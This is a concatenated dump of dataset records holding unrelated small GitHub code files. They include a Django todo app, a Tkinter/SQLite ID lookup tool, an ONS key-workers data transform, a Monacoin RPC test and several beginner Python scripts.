output})\n","repo_name":"pravinMohadikar/flask-POC","sub_path":"app/services/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"5607268126","text":"import sys\n\nfile1=open(sys.argv[1],'r')\nnum_dict={}\nnum_list=[]\nsyn_dict={}\nfor line in file1:\n line_list=line.strip().split('\\t')\n if int(line_list[-1])>int(line_list[-2]):\n num_list.append(int(line_list[-1]))\n else:\n num_list.append(int(line_list[-2]))\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nplt.hist(num_list)\n# sns.distplot(num_list,norm_hist=False,kde=False)\nplt.savefig('xx.png')","repo_name":"zhanglingkui/mSynOrths","sub_path":"bin/cal_flanking_num.py","file_name":"cal_flanking_num.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24245511386","text":"import json\nfrom IPython import display\n\nfrom typing import Any, Dict, List, Text, Union\n\n\ndef render_component(\n component_name: Text,\n data: Union[List[Dict[Text, Union[Dict[Text, Any], Text]]],\n Dict[Text, List[Union[Text, float, List[float]]]]],\n config: Dict[Text, Union[Dict[Text, Dict[Text, Text]], Text, bool]]\n) -> None:\n \"\"\"Renders the specified component in Colab.\n\n Colab requires custom visualization to be rendered in a sandbox so we cannot\n use Jupyter widget.\n\n Args:\n component_name: The name of the component to render.\n data: A dictionary containing data for visualization.\n config: A dictionary containing the configuration.\n \"\"\"\n display.display(\n display.HTML(\"\"\"\n \n <{component_name} id=\"component\">\n \n \"\"\".format(\n component_name=component_name,\n config=json.dumps(config),\n data=json.dumps(data))))\n","repo_name":"yupbank/model-analysis","sub_path":"tensorflow_model_analysis/notebook/colab/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"70237186336","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# # ONS Key workers reference tables \n\nfrom gssutils import * \nimport json\nimport string\nimport warnings\nimport pandas as pd\nimport json\nimport re\n\ndef left(s, amount):\n return s[:amount]\n\ndef right(s, amount):\n return s[-amount:]\n\ndef mid(s, offset, amount):\n return s[offset:offset+amount]\n\ndef cellLoc(cell):\n return right(str(cell), len(str(cell)) - 2).split(\" \", 1)[0]\n\ndef cellCont(cell):\n return re.findall(r\"'([^']*)'\", cell)[0]\n\ndef col2num(col):\n num = 0\n for c in col:\n if c in string.ascii_letters:\n num = num * 26 + (ord(c.upper()) - ord('A')) + 1\n return num\n\ndef colnum_string(n):\n string = \"\"\n while n > 0:\n n, remainder = divmod(n - 1, 26)\n string = chr(65 + remainder) + string\n return string\n\ndef excelRange(bag):\n xvalues = []\n yvalues = []\n for cell in bag:\n coordinate = cellLoc(cell)\n xvalues.append(''.join([i for i in coordinate if not i.isdigit()]))\n yvalues.append(int(''.join([i for i in coordinate if i.isdigit()])))\n high = 0\n low = 0\n for i in xvalues:\n if col2num(i) >= high:\n high = col2num(i)\n if low == 0:\n low = col2num(i)\n elif col2num(i) < low:\n low = col2num(i)\n highx = colnum_string(high)\n lowx = colnum_string(low)\n highy = str(max(yvalues))\n lowy = str(min(yvalues))\n\n return '{' + lowx + lowy + '-' + highx + highy + '}'\n\ndef decimal(s):\n try:\n float(s)\n if float(s) >= 1:\n return True\n else:\n return False\n except ValueError:\n return False\n\ninfo = json.load(open('info.json')) \nlandingPage = info['landingPage'] \nlandingPage \n\n\n# In[2]:\n\n\nscraper = Scraper(landingPage) \nscraper\n\n\n# In[3]:\n\n\ndistribution = scraper.distributions[0]\ndisplay(distribution)\n\n\n# In[4]:\n\n\ntrace = TransformTrace()\n\ntabs = { tab: tab for tab in distribution.as_databaker() }\n\ntidied_sheets = []\n\ndatasetTitle = 'ONS Key Workers Reference Tables'\nlink = distribution.downloadURL\n\nwith open('info.json') as info:\n data = info.read()\n\ninfoData = json.loads(data)\n\ninfoData['transform']['transformStage'] = {}\n\nfor tab in tabs:\n\n if not tab.name.lower() in ['contents', 'notes', 'var dfn', 'table 13', 'table 15']:#ignore tab 13/15 get it checked\n\n columns = ['Period', 'ONS Geography Code', 'Workforce Category', 'Workforce Breakdown', 'Measure Type', 'Unit']\n trace.start(datasetTitle, tab, columns, link)\n\n if right(tab.name.lower(), 2) in [' 8']:\n cell = tab.filter(contains_string('Table ')).shift(0, 4)\n else:\n cell = tab.filter(contains_string('Table ')).shift(0, 5)\n\n if right(tab.name.lower(), 3) in [' 1b', ' 7b', 'e 8', ' 9b', '10b', '11b', '12b', '14b', '16b']:\n remove = tab.filter(contains_string('Source:')).shift(UP).expand(RIGHT).expand(LEFT).expand(DOWN)\n elif right(tab.name.lower(), 7) in ['14b (2)']:\n remove = tab.filter(contains_string('Total')).expand(RIGHT).expand(LEFT).expand(DOWN)\n else:\n remove = tab.filter(contains_string('Source:')).expand(RIGHT).expand(LEFT).expand(DOWN)\n\n pivot = cellLoc(cell)\n\n if right(tab.name.lower(), 2) in [' 8']:\n period = cell.shift(0, -3)\n else:\n period = cell.shift(0, -4)\n\n trace.Period('Period Range for Tab given at cell value: {}', var = cellLoc(period)) \n\n if right(tab.name.lower(), 2) in ['17']:\n region = tab.filter(contains_string('Category')).fill(RIGHT).is_not_blank()\n elif right(tab.name.lower(), 2) in ['18', '19']:\n region = cell.expand(DOWN).is_not_blank() - remove\n else:\n region = 'E92000001'\n\n if isinstance(region, str):\n trace.ONS_Geography_Code('Geo-Code for tab is hard-coded as {}', var = region)\n else:\n trace.ONS_Geography_Code('Values found in range: {}', var = excelRange(region)) \n\n if right(tab.name.lower(), 2) in [' 8']:\n breakdown = 'Has Dependant Child(s)'\n elif right(tab.name.lower(), 2) in ['17', '18', '19']:\n breakdown = 'Key Workers'\n elif right(tab.name.lower(), 3) in [' 1a']:\n breakdown = 'N/A'\n else:\n breakdown = tab.filter(contains_string('Category')).fill(RIGHT).is_not_blank()\n\n if isinstance(breakdown, str):\n trace.Workforce_Breakdown('Workforce Breakdown for tab is hard-coded as {}', var = breakdown)\n else:\n trace.Workforce_Breakdown('Values found in range: {}', var = excelRange(breakdown)) \n\n if right(tab.name.lower(), 2) in ['18']:\n category = tab.filter('City Region').fill(RIGHT).is_not_blank()\n elif right(tab.name.lower(), 2) in ['19']:\n category = tab.filter('Local Authority').fill(RIGHT).is_not_blank()\n else:\n category = cell.expand(DOWN).is_not_blank() - remove\n\n trace.Workforce_Category('Values found in range: {}', var = excelRange(category)) \n\n if right(tab.name.lower(), 3) in [' 2a', ' 2b', ' 17']:\n observations = tab.filter('pop.').fill(DOWN).is_not_blank() - remove\n else:\n observations = tab.filter('population').fill(DOWN).is_not_blank() - remove\n\n measureType = 'Count'\n\n unit = 'Person'\n\n trace.Measure_Type('Hardcoded value as: {}', var = measureType)\n\n trace.Unit('Hardcoded value as: {}',var = unit) \n\n if '(' in tab.name:\n title = cellCont(str(tab.filter(contains_string(str(tab.name[:-4])))))\n else:\n title = cellCont(str(tab.filter(contains_string(str(tab.name)))))\n\n columnInfo = {'Period' : trace.Period.var,\n 'ONS Geography Code' : trace.ONS_Geography_Code.var,\n 'Workforce Category' : trace.Workforce_Category.var,\n 'Workforce Breakdown' : trace.Workforce_Breakdown.var,\n 'Measure Type' : trace.Measure_Type.var,\n 'Unit' : trace.Unit.var}\n\n dicti = {'name' : tab.name, \n 'title' : title, \n 'columns' : columnInfo}\n \n infoData['transform']['transformStage'][tab.name] = dicti\n\n with open('infoTest.json', 'w') as info:\n info.write(json.dumps(infoData, indent=4))\n\n if right(tab.name.lower(), 3) in [' 1a', 'e 8']:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDimConst('ONS Geography Code', region),\n HDim(category, 'Workforce Category', DIRECTLY, LEFT),\n HDimConst('Workforce Breakdown', breakdown),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n elif right(tab.name.lower(), 2) in ['17']:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDim(region, 'ONS Geography Code', CLOSEST, LEFT),\n HDim(category, 'Workforce Category', DIRECTLY, LEFT),\n HDimConst('Workforce Breakdown', breakdown),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n elif right(tab.name.lower(), 2) in ['18', '19']:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDim(region, 'ONS Geography Code', DIRECTLY, LEFT),\n HDim(category, 'Workforce Category', CLOSEST, LEFT),\n HDimConst('Workforce Breakdown', breakdown),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n else:\n dimensions = [\n HDim(period, 'Period', CLOSEST, ABOVE),\n HDimConst('ONS Geography Code', region),\n HDim(category, 'Workforce Category', DIRECTLY, LEFT),\n HDim(breakdown, 'Workforce Breakdown', CLOSEST, LEFT),\n HDimConst('Tab', tab.name),\n HDimConst('Measure Type', measureType), \n HDimConst('Unit', unit) \n ]\n \n tidy_sheet = ConversionSegment(tab, dimensions, observations)\n trace.with_preview(tidy_sheet)\n\n trace.store(\"keyWorkers\", tidy_sheet.topandas())\n\n else:\n continue\n\n\n# In[5]:\n\n\npd.set_option('display.float_format', lambda x: '%.0f' % x)\n\ndf = trace.combine_and_trace(datasetTitle, \"keyWorkers\").fillna('')\n\ndf = df.reset_index(drop=True)\n\ndf['Period'] = df.apply(lambda x: x['Period'].replace('United Kingdom, ', '') if 'United Kingdom, ' in x['Period'] else x['Period'], axis = 1)\n\ndf = df.replace({'DATAMARKER' : {\n '-' : 'Supressed due to small sample size'}})\n\ndf['Workforce Breakdown'] = df.apply(lambda x: str(x['Workforce Breakdown']) + ' aged under 4' if 'Table 9' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf['Workforce Breakdown'] = df.apply(lambda x: str(x['Workforce Breakdown']) + ' aged under 15' if 'Table 10' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf['Workforce Breakdown'] = df.apply(lambda x: 'Travel to work via ' + str(x['Workforce Breakdown']) if 'Table 14a' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf['Workforce Breakdown'] = df.apply(lambda x: 'Travel to work via ' + str(x['Workforce Breakdown']) if 'Table 14b' in x['Tab'] else x['Workforce Breakdown'], axis = 1)\n\ndf = df.drop(['Tab'], axis = 1)\n\ndf = df[['Period', 'ONS Geography Code', 'Workforce Category', 'Workforce Breakdown', 'Measure Type', 'Unit', 'OBS', 'DATAMARKER']]\n\ndf\n\n\n# In[6]:\n\n\nnotes = \"\"\"\nAll counts are individually rounded to the nearest thousand. Totals may not add exactly due to this rounding.\nThe definition of disability used is consistent with the core definition of disability under the Equality Act 2010. A person is considered to be disabled if they self-report a physical or mental health condition or illness lasting or expecting to last 12 months or more which reduces their ability to carry out day-to-day activities.\nRespondents who did not provide disability status have been excluded.\n\"\"\"\n\n\n# In[7]:\n\n\nfrom IPython.core.display import HTML\nfor col in df:\n if col not in ['Value']:\n df[col] = df[col].astype('category')\n display(HTML(f\"

    {col}

    \"))\n display(df[col].cat.categories)\n\n\n# In[8]:\n\n\nfor column in df:\n if column in ('Workforce Breakdown', 'Workforce Category'):\n df[column] = df[column].map(lambda x: pathify(x))\n\n\n# In[9]:\n\n\nout = Path('out')\nout.mkdir(exist_ok=True)\n\ntitle = pathify(datasetTitle)\n\nscraper.dataset.comment = notes\n\nimport os\n\ndf.drop_duplicates().to_csv(out / f'{title}.csv', index = False)\n\nwith open(out / f'{title}.csv-metadata.trig', 'wb') as metadata:\n metadata.write(scraper.generate_trig())\n\ntrace.output()\n\ndf\n\n","repo_name":"GSS-Cogs/family-covid-19","sub_path":"datasets/ONS-Key-workers-population-and-characteristics-2019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10953142698","text":"import sqlite3\r\nconn = sqlite3.connect('id.db')\r\nimport tkinter as tk\r\nimport ctypes\r\nctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 )\r\n\r\n\r\nconn = sqlite3.connect('id.db')\r\nconn.execute(\"CREATE TABLE IF NOT EXISTS idAddress(_id integer PRIMARY KEY, studentName text, ID integer)\")\r\nroot = tk.Tk()\r\nroot.title(\"ID List\")\r\nsubmit_label = tk.Label(root, text=\"Add a New person to the Data Base : \", font=\"Tahoma 17 underline\")\r\nsubmit_label.grid(row=0, column=0)\r\ndef submit():\r\n conn = sqlite3.connect('id.db')\r\n c = conn.cursor()\r\n ign = nameA.get()\r\n idAdr = idAdress.get()\r\n\r\n c.execute(\"SELECT * FROM idAddress WHERE studentName=? AND ID=?\", (ign, int(idAdr)))\r\n a = c.fetchall()\r\n if a == []:\r\n c.execute(\"\"\"INSERT INTO idAddress(studentName, ID) VALUES(:f_name, :id_name)\"\"\",\r\n {'f_name': ign.lower(), 'id_name': idAdr})\r\n conn.commit()\r\n conn.close()\r\n nameA.delete(0, 'end')\r\n idAdress.delete(0, 'end')\r\n nameA.delete(0, 'end')\r\n idAdress.delete(0, 'end')\r\n else:\r\n nameA.delete(0, 'end')\r\n idAdress.delete(0, 'end')\r\n print(\"FUCK YOU\")\r\nc = conn.cursor() #Create cursor\r\n# c.execute(\"\"\"select * from id\"\"\")\r\n#create a table\r\nnameA = tk.Entry(root, width=40)\r\nnameA.grid(row=1, column=2)\r\nidAdress = tk.Entry(root, width=40)\r\nidAdress.grid(row=2, column=2)\r\nname_label = tk.Label(root, text=\"Enter full name : \",fg='blue')\r\nname_label.grid(row=1, column=0)\r\nid_label = tk.Label(root, text=\"Enter the ID number : \", fg='blue')\r\nmyButton = tk.Button(root, text=\"Click To Enter a new name to the data base\", command=submit)\r\nmyButton.grid(row=3, column=2)\r\nid_label.grid(row=2, column=0)\r\nconn.commit() #Commit changes\r\nsubmit_label = tk.Label(root, text=\"Searching given an ID : \", font=(\"Tahoma\", 17))\r\nsubmit_label.grid(row=4, column=0)\r\nprint_label1 = tk.Label(root)\r\ndef search():\r\n global print_label1\r\n print_label1.destroy()\r\n conn = sqlite3.connect('id.db')\r\n c = conn.cursor()\r\n idA = IdAdress.get()\r\n c.execute(\"SELECT studentName FROM idAddress WHERE ID=?\", (str(idA),))\r\n a = str(c.fetchall())\r\n b = \"\"\r\n for element in a:\r\n if element.isalpha() or element == \" \":\r\n b+= element\r\n\r\n print_label1 = tk.Label(root, text=b)\r\n print_label1.grid(row=6, column=0)\r\n conn.commit()\r\n conn.close()\r\nIdAdress = tk.Entry(root, width=50)\r\nIdAdress.grid(row=5, column=2)\r\nIdLabel = tk.Label(root,fg='red', text=\"Enter the Desired ID : \")\r\nIdLabel.grid(row=5, column=0)\r\nmyButton = tk.Button(root, text=\"Click To Search\", command=search)\r\nmyButton.grid(row=6, column=2)\r\nsubmit_label = tk.Label(root, text=\"Searching given Name : \", font=(\"Tahoma\", 17))\r\nsubmit_label.grid(row=7, column=0)\r\nsubmit_label = tk.Label(root, text=\"Doesn't have to be Accurate \", font=\"Tahoma 8 bold\")\r\nsubmit_label.grid(row=9, column=0)\r\nprint_label = tk.Label(root)\r\ndef search_name():\r\n global print_label\r\n print_label.destroy()\r\n conn = sqlite3.connect('id.db')\r\n c = conn.cursor()\r\n idA = NameAdr.get()\r\n idB = \"%\" + idA + \"%\"\r\n c.execute(\"SELECT studentName, ID FROM idAddress WHERE studentName LIKE ?\", (idB.lower(),))\r\n a = str(c.fetchall())\r\n listofshit = [\"{\", \"}\", \"[\", \"]\"]\r\n for i in listofshit:\r\n a = a.replace(i, \"\")\r\n\r\n print_label = tk.Label(root, text=a)\r\n print_label.grid(row=10, column=0)\r\n conn.commit()\r\n conn.close()\r\nNameAdr = tk.Entry(root, width=50)\r\nNameAdr.grid(row=8, column=2)\r\nNameLabel = tk.Label(root, fg='purple', text=\"Enter the Desired Name : \")\r\nNameLabel.grid(row=8, column=0)\r\nmyButton = tk.Button(root, text=\"Click To Search\", command=search_name)\r\nmyButton.grid(row=9, column=2)\r\ndef delete_by_id():\r\n conn = sqlite3.connect('id.db')\r\n a = int(DeleteID.get())\r\n conn.execute(\"DELETE FROM idAddress WHERE ID=?\", (a,))\r\n conn.commit()\r\n conn.close()\r\n DeleteID.delete(0, 'end')\r\nDeleteID = tk.Entry(root, width=50)\r\nDeleteID.grid(row=13 ,column=2)\r\nDeleteLabel = tk.Label(root, text=\"Delete ID : \", font=\"Tahoma 18\")\r\nDeleteLabel.grid(row=12, column=0)\r\nDeleteLabel2 = tk.Label(root, text=\"Enter the ID : \", fg=\"pink\", font=\"bold\")\r\nDeleteLabel2.grid(row=13, column=0)\r\ndeletebutton = tk.Button(root, text=\"Enter to Delete\", command=delete_by_id)\r\ndeletebutton.grid(row=14, column=2)\r\n#Close Connection\r\nconn.close()\r\n# function that cleans the information\r\n\r\nroot.mainloop()\r\n\r\n\r\n","repo_name":"tzlilLV97/IDconsole","sub_path":"newmain.py","file_name":"newmain.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36739641316","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Item\nfrom .forms import ItemForm\n\n\n# Create your views here.\ndef get_todo_list(request):\n items = Item.objects.all()\n # context dic is the way we pas var to the template\n # The key should correspond to the var we want to pass\n context = {\n 'items': items\n }\n return render(request, 'todo/todo_list.html', context)\n\n\ndef add_item(request):\n if request.method == 'POST':\n # Use the form template to populate the form automatically\n # with the request.post method\n form = ItemForm(request.POST)\n # Check the form validity\n if form.is_valid():\n # save the form\n form.save() # corresp to Item.objects.create(name=name, done=done)\n return redirect('get_todo_list')\n\n # Get the forms info\n # name = request.POST.get('item_name')\n # done = 'done' in request.POST\n\n # Create an Item in the db\n # Item.objects.create(name=name, done=done)\n\n form = ItemForm()\n context = {\n 'form': form\n }\n return render(request, 'todo/add_item.html', context)\n\n\ndef edit_item(request, item_id):\n item = get_object_or_404(Item, id=item_id)\n\n if request.method == 'POST':\n form = ItemForm(request.POST, instance=item)\n if form.is_valid():\n form.save()\n return redirect('get_todo_list')\n\n # the instance=item param is to tell the form to prepopulate\n # with the item retreived above\n form = ItemForm(instance=item)\n context = {\n 'form': form\n }\n return render(request, 'todo/edit_item.html', context)\n\n\ndef toggle_item(request, item_id):\n item = get_object_or_404(Item, id=item_id)\n item.done = not item.done\n item.save()\n return redirect('get_todo_list')\n\n\ndef delete_item(request, item_id):\n item = get_object_or_404(Item, id=item_id)\n item.delete()\n return redirect('get_todo_list')\n","repo_name":"Tom-Nagy/hello-django","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3734917655","text":"from test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import assert_equal\n\nLABELS_TO_TEST = frozenset({\"\" , \"New №…Ё $<#>&!б€б‹аБаА Label\"})\n\nclass GetAddressInfoLabelsPurposeDeprecationTest(BitcoinTestFramework):\n def set_test_params(self):\n self.num_nodes = 2\n self.setup_clean_chain = False\n # Start node[0] with -deprecatedrpc=labelspurpose and node[1] without.\n self.extra_args = [[\"-deprecatedrpc=labelspurpose\"], []]\n\n def skip_test_if_missing_module(self):\n self.skip_if_no_wallet()\n\n def test_labels(self, node_num, label_name, expected_value):\n node = self.nodes[node_num]\n address = node.getnewaddress()\n if label_name != \"\":\n node.setlabel(address, label_name)\n self.log.info(\" set label to {}\".format(label_name))\n labels = node.getaddressinfo(address)[\"labels\"]\n self.log.info(\" labels = {}\".format(labels))\n assert_equal(labels, expected_value)\n\n def run_test(self):\n \"\"\"Test getaddressinfo labels with and without -deprecatedrpc flag.\"\"\"\n self.log.info(\"Test getaddressinfo labels with -deprecatedrpc flag\")\n for label in LABELS_TO_TEST:\n self.test_labels(node_num=0, label_name=label, expected_value=[{\"name\": label, \"purpose\": \"receive\"}])\n\n self.log.info(\"Test getaddressinfo labels without -deprecatedrpc flag\")\n for label in LABELS_TO_TEST:\n self.test_labels(node_num=1, label_name=label, expected_value=[label])\n\n\nif __name__ == '__main__':\n GetAddressInfoLabelsPurposeDeprecationTest().main()\n","repo_name":"monacoinproject/monacoin","sub_path":"test/functional/rpc_getaddressinfo_labels_purpose_deprecation.py","file_name":"rpc_getaddressinfo_labels_purpose_deprecation.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"33"} +{"seq_id":"33218307672","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n# from django.contrib.auth.models import User\n\n\nclass SetUp(models.Model):\n # user id, 一个用户可以有多个配置\n user = models.ForeignKey(\n User,\n models.SET_NULL,\n blank=True,\n null=True,\n )\n # 配置名字: 自己取一个名字\n name = models.CharField(\"目标名称\", max_length=30)\n # 每周完成几次\n times = models.PositiveIntegerField(\"打卡次数\", default=3)\n # 创建时间\n created_time = models.DateTimeField(auto_now_add=True)\n # 更新时间\n update_time = models.DateTimeField(auto_now=True)\n # 状态, 生效, 停止\n status = models.BooleanField('目标状态', default=1)\n\n\nclass Balance(models.Model):\n # user id, 一个用户只能有一个余额\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True,\n )\n # 余额\n amount = models.PositiveIntegerField(default=0)\n # 创建时间\n created_time = models.DateTimeField(auto_now_add=True)\n # 更新时间\n update_time = models.DateTimeField(auto_now=True)\n\n\nclass ClockIn(models.Model):\n # user id, 一个用户可以有很多打卡\n user = models.ForeignKey(\n User,\n models.SET_NULL,\n blank=True,\n null=True,\n )\n # 打卡种类\n setup = models.ForeignKey(\n SetUp,\n models.SET_NULL,\n blank=True,\n null=True,\n )\n # 图片 0\n image_0 = models.ImageField()\n # 打卡时间\n created_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = [\"-id\"]\n","repo_name":"dongtianyi/xiaomubiao","sub_path":"goal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"1664204082","text":"__author__ = 'jcastro'\n\nfrom tournament import Tournament\n\nimport abc\n\n\nclass Game(object):\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def calculate_score(self, score):\n \"\"\"Returns final score for player\"\"\"\n\n\nclass Basketball(Game):\n\n point_position = {\n 'G': [2, 3, 1],\n 'F': [2, 2, 2],\n 'C': [2, 1, 3]\n }\n\n def calculate_score(self, game):\n score_player = game['score']\n position_player = game['position']\n score_total = 0\n if position_player in self.point_position:\n score_position = self.point_position[position_player]\n\n for i in range(len(score_player)):\n score_total += int(score_player[i]) * int(score_position[i])\n\n return score_total\n\n# player 1;nick1;4;Team A;G;10;2;7\n# player 2;nick2;8;Team A;F;0;10;0\n# player 3;nick3;15;Team A;C;15;10;4\n# player 4;nick4;16;Team B;G;20;0;0\n# player 5;nick5;23;Team B;F;4;7;7\n# player 6;nick6;42;Team B;C;8;10;0\n\nmy_tournament = Tournament()\n\nmy_tournament.create_game(\"basketball\", Basketball())\nstrPlayer = \"player 1;nick1;4;Team A;G;10;2;7\"\nstrPlayer2 = \"player 2;nick2;8;Team A;F;0;10;0\"\nstrPlayer3 = \"player 4;nick4;16;Team B;G;20;0;0\"\nmy_tournament.parser(\"basketball\", strPlayer)\nmy_tournament.parser(\"basketball\", strPlayer2)\nmy_tournament.parser(\"basketball\", strPlayer3)\n\nmy_tournament.create_game(\"basketballHARD\", Basketball())\nstrPlayer = \"player 1;nick1;4;Team A;G;10;2;7\"\nstrPlayer2 = \"player 2;nick2;8;Team A;F;0;10;0\"\nstrPlayer3 = \"player 4;nick4;16;Team B;G;230;0;0\"\nmy_tournament.parser(\"basketballHARD\", strPlayer)\nmy_tournament.parser(\"basketballHARD\", strPlayer2)\nmy_tournament.parser(\"basketballHARD\", strPlayer3)\n\nprint(my_tournament.mvp())","repo_name":"jcastrojob/kata_tucan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23950829961","text":"#!/bin/env python\n\nimport os, os.path\n\nucf101_frm_root = '/data1/wangyf/dataset/ucf101/ucf101_frm/'\nlabel_file = open('/home/wangyf/Lab/two-stream-dev/vgg_cnn_m_2048_finetune/classInd.txt')\n\nvideo_types = []\nfor line in label_file:\n\tvideo_type_name = line.split()[1]\n#\tprint(video_type_name)\n\tvideo_types.append(video_type_name)\n\nlabel_file.close()\n\ntest_list = open('/home/wangyf/Lab/two-stream-dev/vgg_cnn_m_2048_finetune/testlist01.txt','r')\ntest_list_apdated = open('/home/wangyf/Lab/two-stream-dev/vgg_cnn_m_2048_finetune/test.txt','w')\nnew_line = \"\"\nfor line in test_list:\n\ttype_name = line.split('/')[0];\n#\tprint('type_name:'+type_name)\n\tline = line.split('\\r')[0] \n\tframe_dir = ucf101_frm_root + line\n#\tprint('frame_dir:'+frame_dir)\n\tframe_sum = len([name for name in os.listdir(frame_dir) if os.path.isfile(os.path.join(frame_dir, name))])\n#\tprint('frame sum: '+str(frame_sum))\n\torder = video_types.index(type_name) + 1\n#\tprint('order:'+str(order))\n\tmiddle_frame = frame_sum / 2\n\tif middle_frame <= 0:\n\t\tprint('middle<=0, frame_dir:'+frame_dir) \n\tnew_line = '%s%06d.jpg %d\\n' %(line, middle_frame, order-1) \n\ttest_list_apdated.write(new_line)\n#\tfor i in range(1,frame_sum+1):\n#\t\tnew_line = '%s%06d.jpg %d\\n' %(frame_dir, i, order) \n#\t\tprint(new_line)\n#\t\ttest_list_apdated.write(new_line)\n\ntest_list.close()\ntest_list_apdated.close()\n\n\n","repo_name":"vra/Python-Tools","sub_path":"create_test_list_file.py","file_name":"create_test_list_file.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"73175972575","text":"from PIL import Image\nimport numpy as np\nimport skvideo.io\nfrom skimage.util import img_as_float, img_as_ubyte\nimport sys\nimport argparse\nimport math\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str)\nparser.add_argument('--output', type=str, default='out.png')\nparser.add_argument('--start', type=int, default=0)\nparser.add_argument('--interval', type=int, default=70)\nparser.add_argument('--ymin', type=int, default=-100)\nparser.add_argument('--ymax', type=int, default=-10)\nargs = parser.parse_args()\n\nvideodata = img_as_float(skvideo.io.vread(args.input))\nvideodata = videodata[args.start:, :, :, :]\nframes, h, w, channels = videodata.shape\n\nsingle_h = args.ymax - args.ymin\nnum_stacked = math.floor(frames / args.interval)\n\ncoalesced = np.zeros((num_stacked*single_h, w, channels))\nfor i in range(num_stacked):\n coalesced[single_h*i:single_h*(i+1),:,:] = \\\n videodata[i*args.interval,args.ymin:args.ymax,:,:]\n\nimg = Image.fromarray(img_as_ubyte(coalesced), 'RGB')\nimg.save(args.output)\nimg.show()\n","repo_name":"davepagurek/boneless","sub_path":"scripts/stack_frames.py","file_name":"stack_frames.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"1182037720","text":"from random import uniform\n\n\ndef transfer_list_in_str(list_in: list) -> str:\n \"\"\"Преобразует каждый элемент списка (вещественное число) в строку вида ' руб коп' и\n формирует из них единую строковую переменную разделяя значения запятой.\"\"\"\n str_out = ''\n for i in list_in[:-1]:\n rub = int(i)\n cop = str(int(i*100%100))\n str_out += f\"{rub} руб {cop.zfill(2)} коп, \"\n rub = int(list_in[-1])\n cop = str(int(list_in[-1] * 100 % 100))\n str_out += (f\"{rub} руб {cop.zfill(2)} коп\")\n return str_out\n\n\nmy_list = [round(uniform(10, 100), 2) for _ in range(1, 16)] # автоматическая генерация случайных 15 чисел\nprint(f'Исходный список: {my_list}')\nresult_1 = transfer_list_in_str(my_list)\nprint(result_1)\n\n\ndef sort_prices(list_in: list) -> list:\n \"\"\"Сортирует вещественные числа по возрастанию, не создавая нового списка\"\"\"\n list_in.sort()\n return list_in\n\n\nprint(\"ID my_list = \", id(my_list))\nresult_2 = sort_prices(my_list)\nprint(\"ID result_2 = \", id(result_2))\nprint(transfer_list_in_str(result_2))\n\n\ndef sort_price_adv(list_in: list) -> list:\n \"\"\"Создаёт новый список и возвращает список с элементами по убыванию\"\"\"\n list_out = sorted(list_in, reverse=True)\n return list_out\n\n\nresult_3 = sort_price_adv(my_list)\nprint(transfer_list_in_str(result_3))\n\n\ndef check_five_max_elements(list_in: list) -> list:\n \"\"\"Проверяет элементы входного списка вещественных чисел и возвращает\n список из ПЯТИ максимальных значений\"\"\"\n list_out = sorted(list_in, reverse=True)[:5]\n return list_out\n\n\nresult_4 = check_five_max_elements(my_list)\nprint(transfer_list_in_str(result_4))\n","repo_name":"juliyamakutu/python_again","sub_path":"Bryukhovskikh_Yuliya_dz_2/task_2_5.py","file_name":"task_2_5.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"25219549541","text":"length = int(input(\"Length Of List\"))\n\npointlesslist=[]\n\nprint(\"Input the List elements:-\\n\")\n\nfor i in range(1,length+1):\n print(\"The Element\",i,\":-\")\n pointlesslist.append(input())\n\n\nvarele = 